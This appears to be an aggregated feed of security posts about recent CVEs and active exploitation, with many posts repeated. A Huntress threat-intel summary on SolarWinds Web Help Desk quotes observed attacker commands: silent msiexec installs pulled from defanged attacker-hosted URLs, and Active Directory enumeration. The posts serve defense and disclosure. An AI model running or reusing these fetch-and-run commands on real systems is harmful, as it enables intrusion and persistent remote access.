What Defined Defense in 2025
Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...
ποΈ [Binarydefense] https://link.is.it/3GT18k
##What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomwareβ¦
CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly donβt. The Exploit Chain: Familiar Steps, Different Stage At its core,β¦
ποΈ [Binarydefense] https://link.is.it/EtPFu3
##What Defined Defense in 2025
Read the full blog WHAT CVE-2025-53770 TEACHES US ABOUT ZERO-DAY REALITY AND RANSOMWARE ROUTINE This blog reframes zero-day exploitation as an...
ποΈ [Binarydefense] https://link.is.it/3GT18k
##What CVE-2025-53770 Teaches Us About Zero-Day Reality and Ransomwareβ¦
CVE-2025-53770 is a critical SharePoint RCE flaw. The goals certainly donβt. The Exploit Chain: Familiar Steps, Different Stage At its core,β¦
ποΈ [Binarydefense] https://link.is.it/EtPFu3
##updated 2025-10-10T16:22:30.703000
1 posts
1 repos
π¨ New Exploit: motionEye 0.43.1b4 - RCE
π CVE: CVE-2025-60787
π€ Author: prabhat
π https://www.exploit-db.com/exploits/52481
#ExploitDB #InfoSec #CyberSecurity #CVE-2025-60787
##updated 2025-09-23T06:30:33
5 posts
1 repos
----------------
π― Threat Intelligence
===================
Executive summary: Huntress observed active exploitation of SolarWinds Web Help Desk (WHD) tied to recent untrusted-deserialization vulnerabilities, notably CVE-2025-26399 and CVE-2025-40551. Attackers achieved remote code execution and quickly deployed legitimate remote-management and DFIR tooling to maintain access.
Technical details:
β’ Initial process chain reported: wrapper.exe (WHD service wrapper) spawned java.exe (Tomcat-based WHD) which launched cmd.exe to silently install MSI payloads.
β’ Observed staged installers and deployment vectors:
β’ msiexec /q /i hxxps://files.catbox[.]moe/tmp9fc.msi (Zoho/ManageEngine RMM agent)
β’ msiexec /q /i hxxps://vdfccjpnedujhrzscjtq.supabase[.]co/.../v4.msi (Velociraptor MSI)
β’ Remote access persistence included unattended Zoho Assist/ManageEngine registration tied to Proton Mail account esmahyft@proton[.]me.
β’ Post-exploitation activity included Active Directory discovery using net group "domain computers" /do, executed from the RMM agent process TOOLSIQ.EXE.
Attack chain analysis:
β’ Initial Access: Exploitation of WHD deserialization vulnerabilities (CVE-2025-26399, CVE-2025-40551).
β’ Download: MSI payloads hosted on third-party services (Catbox, Supabase).
β’ Execution: Silent MSI installation via spawned command process from WHD service chain.
β’ Persistence & Lateral Movement: Legitimate RMM agent configured for unattended access; AD enumeration to enumerate domain targets.
β’ C2/Tooling: Velociraptor deployed and configured pointing at attacker-controlled storage/infrastructure.
Detection considerations:
β’ Monitor for anomalous child processes of wrapper.exe/java.exe and unexpected use of msiexec pulling from unusual domains.
β’ Look for registrations or sessions associated with Zoho/ManageEngine agents and unusual agent process names like TOOLSIQ.EXE.
β’ Review AD enumeration activity (net group queries) originating from endpoints hosting WHD or RMM agents.
Limitations & notes:
β’ Huntress observed exploitation across three customers and reports protection coverage across 84 endpoints in 78 organizations using WHD.
β’ Public advisories include Microsoft notes and CISA listing for CVE-2025-40551; versions prior to 12.8.7 HF1 are reported as vulnerable.
πΉ solarwinds #CVE-2025-26399 #CVE-2025-40551 #velociraptor #zoho
π Source: https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWindsβ website as soon as possible. https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##π‘οΈ CyberHost Malware List Stats π‘οΈ
3 new domains were added yesterday
Threat Intel Used:
https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
Blocklist Details: https://cyberhost.uk/malware-blocklist
##Huntress researchers Anna Pham, John Hammond & Jamie Levy observed threat actors exploiting a SolarWinds Web Help Desk vulnerability and warn organizations to apply the update from SolarWindsβ website as soon as possible. https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399
##From yesterday.
Huntress: Active Exploitation of SolarWinds Web Help Desk https://www.huntress.com/blog/active-exploitation-solarwinds-web-help-desk-cve-2025-26399 @huntress #infosec #SolarWinds #vulnerability #threatresearch
##updated 2025-04-28T16:48:57.070000
1 posts
you were literally shown an example of a recent Acrobat Reader bug that potentially could lead to RCE - many other examples are available, like www.cvedetails.com/cve/CVE-2025...; if you want more, Google is right where you left it
CVE-2025-27158 : Acrobat Reade...
updated 2025-04-15T14:24:22
2 posts
Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:
https://www.cve.org/CVERecord?id=CVE-2025-3573
The search relies on descriptions for which standard terms are "an ongoing area of research" π§
https://www.cve.org/ResourcesSupport/FAQs#pc_cve_list_basicssearch_cve
##Should be a lot more! They don't organise frontend and npm vuln that way. This doesn't even mention JavaScript:
https://www.cve.org/CVERecord?id=CVE-2025-3573
The search relies on descriptions for which standard terms are "an ongoing area of research" π§
https://www.cve.org/ResourcesSupport/FAQs#pc_cve_list_basicssearch_cve
##π¨ CVE-2026-25993 (CRITICAL): EverShop <2.1.1 allows unauthenticated SQL injection via url_key in category handling. Upgrade to 2.1.1+ or enforce input validation now! https://radar.offseq.com/threat/cve-2026-25993-cwe-89-improper-neutralization-of-s-6994a1ac #OffSeq #SQLInjection #Infosec #EverShop #Vuln
##π CVE-2026-25947 - High (8.8)
Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25947/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25947 - High (8.8)
Worklenz is a project management tool. Prior to 2.1.7, there are multiple SQL injection vulnerabilities were discovered in backend SQL query construction affecting project and task management controllers, reporting and financial data endpoints, re...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25947/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25506 - High (7.7)
MUNGE is an authentication service for creating and validating user credentials. From 0.5 to 0.5.17, local attacker can exploit a buffer overflow vulnerability in munged (the MUNGE authentication daemon) to leak cryptographic key material from pro...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25506/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-24684 - High (7.5)
FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.22.0, the RDPSND async playback thread can process queued PDUs after the channel is closed and internal state is freed, leading to a use after free in rdpsnd_treat_wave. T...
π https://www.thehackerwire.com/vulnerability/CVE-2026-24684/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##libpng 1.6.55 has been released with fix to CVE-2026-25646:
"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.
The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.
The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).
Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.
This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."
Announcement: https://www.openwall.com/lists/oss-security/2026/02/09/7
Advisory: https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Fix: https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88
libpng 1.6.55 has been released with fix to CVE-2026-25646:
"CVE-2026-25646 (High): Heap buffer overflow in png_set_quantize when called with no histogram and a palette larger than twice the requested maximum number of colors.
The vulnerability exists in the color quantization code that reduces the number of colors in a palette. A logic error in the color distance table causes current palette indices to be stored where original indices are expected. After palette entries are swapped during color pruning, the index mismatch causes the pruning loop to fail to find valid candidates, the search bound grows past the end of a heap-allocated buffer, and out-of-bounds reads occur.
The images that trigger this vulnerability are valid per the PNG specification. The bug has existed since the initial version of png_set_quantize (then called png_set_dither).
Unlike the recent CVEs fixed in libpng 1.6.51, 1.6.52 and 1.6.54, whichaffected the simplified API, this vulnerability affects the low-level function png_set_quantize.
This can result in denial of service and potentially information disclosure or arbitrary code execution via heap corruption."
Announcement: https://www.openwall.com/lists/oss-security/2026/02/09/7
Advisory: https://github.com/pnggroup/libpng/security/advisories/GHSA-g8hp-mq4h-rqm3
Fix: https://github.com/pnggroup/libpng/commit/01d03b8453eb30ade759cd45c707e5a1c7277d88
π CVE-2026-25931 - High (7.8)
vscode-spell-checker is a basic spell checker that works well with code and documents. Prior to v4.5.4, DocumentSettings._determineIsTrusted treats the configuration value cSpell.trustedWorkspace as the authoritative trust flag. The value defaults...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25931/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25931 - High (7.8)
vscode-spell-checker is a basic spell checker that works well with code and documents. Prior to v4.5.4, DocumentSettings._determineIsTrusted treats the configuration value cSpell.trustedWorkspace as the authoritative trust flag. The value defaults...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25931/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25808 - High (7.5)
Hollo is a federated single-user microblogging software designed to be federated through ActivityPub. Prior to 0.6.20 and 0.7.2, there is a security vulnerability where DMs and followers-only posts were exposed through the ActivityPub outbox endpo...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25808/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25808 - High (7.5)
Hollo is a federated single-user microblogging software designed to be federated through ActivityPub. Prior to 0.6.20 and 0.7.2, there is a security vulnerability where DMs and followers-only posts were exposed through the ActivityPub outbox endpo...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25808/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25807 - High (8.8)
ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure complex environments. Prior to 9.0.3, the P2P terminal sharing feature (share start) opens a TCP socket on port 5757 without any authentication mechanism. Any remote ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25807/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25807 - High (8.8)
ZAI Shell is an autonomous SysOps agent designed to navigate, repair, and secure complex environments. Prior to 9.0.3, the P2P terminal sharing feature (share start) opens a TCP socket on port 5757 without any authentication mechanism. Any remote ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25807/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25880 - High (7.8)
SumatraPDF is a multi-format reader for Windows. In 3.5.2 and earlier, the PDF reader allows execution of a malicious binary (explorer.exe) located in the same directory as the opened PDF when the user clicks File β βShow in folderβ. This be...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25880/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25231 - High (7.5)
FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25231/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π CVE-2026-25231 - High (7.5)
FileRise is a self-hosted web file manager / WebDAV server. Versions prior to 3.3.0, the application contains an unauthenticated file read vulnerability due to the lack of access control on the /uploads directory. Files uploaded to this directory ...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25231/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##π΄ CVE-2026-25057 - Critical (9.1)
MarkUs is a web application for the submission and grading of student assignments. Prior to 2.9.1, instructors are able to upload a zip file to create an assignment from an exported configuration (courses//assignments/upload_config_files). The upl...
π https://www.thehackerwire.com/vulnerability/CVE-2026-25057/
#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack
##Security Advisory: Privilege escalation to the `CAP_NET_RAW` capability via the `programs.captive-browser` NixOS module (CVE-2026-25740)
##